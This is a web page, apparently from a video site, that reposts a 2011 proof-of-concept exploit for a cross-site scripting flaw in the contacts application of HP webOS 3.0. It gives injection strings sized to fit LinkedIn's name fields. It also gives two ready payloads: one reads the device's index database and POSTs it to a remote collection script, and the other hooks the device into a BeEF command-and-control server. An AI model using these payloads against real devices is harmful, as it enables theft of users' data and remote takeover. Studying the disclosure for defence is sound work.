The next 100 people to upload a video to NepTime will receive 25 IMT and 250 points ($5)! Just make sure to update your BNB wallet address for IMT donations on your settings page.
HP TouchPad Exploit - WebOS3.0 Remote Code Execution
All comments and opinions are the property of this individual, and do not represent my employer(s) or their policies. All content is provided "as is" with no warranties, assurances, or guarantees.
DISCLAIMER*
For educational purposes only.
"Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for fair use for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use."
# Exploit Title: HP webOS 3.0 Remote Code Execution Vulnerability
# Author: malloc(i)
# Date: 06/30/2011
# Software Link:
# https://developer.palm.com/con....tent/resources/devel
# Product: http://www.palm.com/us/product....s/pads/touchpad/inde
AJAX Code:
http://cybermediaplanet.com/se....curity/webOS3.0/webO
White Doc From webOS 1.4.x (Same Concept Different Version) :
http://cybermediaplanet.com/se....curity/webOS1.4.x/Pa
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP webOS 3.0. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the contacts application. When handling the first name and/or last name from an imported contact, malicious injected HTML/JvaScript code renders, which allows an attacker to inject arbitrary code into the contacts application. This can be abused by an attacker to perform a cross-site scripting attack on the device.
The ability for an attacker to execute arbitrary code can be demonstrated by the following proof of concept.
Attack Vector:
Inject the javascript code into the contact information within linkedin to get an external JavaScript file to execute. The first name and Last name fields concatenate within webOS, so the character limit of 20 chars per name entry imposed by linkedin can be extended to 40 characters.
JavaScript code could also be run through an iframe, img, etc..:
Create a vector within the 40 Character limit:
<iframe src="javascript:document.write('<script src=URL/payload.js></script>')">
<iframe src='javascript:[CODE]'></iframe>
<a href='javascript:[CODE]'></a>
<img src='javascript:[CODE]'/>
Inject XSS code to source in a remote JavaScript file which will execute the malicious payload.
Remote JavaScript Payload Examples:
1) Remote File Access Vulnerability
document.write("<html><head><script src=\"/usr/palm/frameworks/mojo/mojo.js\" type=\"text/javascript\" ></script></head><iframe src=\"javascript:var get=new Ajax.Request('/var/db/main/indexes.db',{method:'get',evalJSON:'false',onSuccess:function(response){var request=new Ajax.Request('http://www.URL/collectData.php',{method:'post',evalJson:'false',postBody:response.responseText});}});\"></html>");
2) Remote Command and Control (BeEF)
document.write("<html><head><script src=\"/usr/palm/frameworks/mojo/mojo.js\" type=\"text/javascript\" x-mojo-version\"1\"></script></head><script src=\"http://URL/beef/hook/beefmagic.js.php\" type=\"text/javascript\" x-mojo-version=\"1\"></script></html>");
WebOS3.0 SDK Email Exploit Example:
http://www.youtube.com/watch?v=qKKrcJeyY-w
How It Is Done (WebOS1.4.x Example):
http://www.youtube.com/watch?v=Y5f8zJNiB_0
http://cybermediaplanet.com/security.html
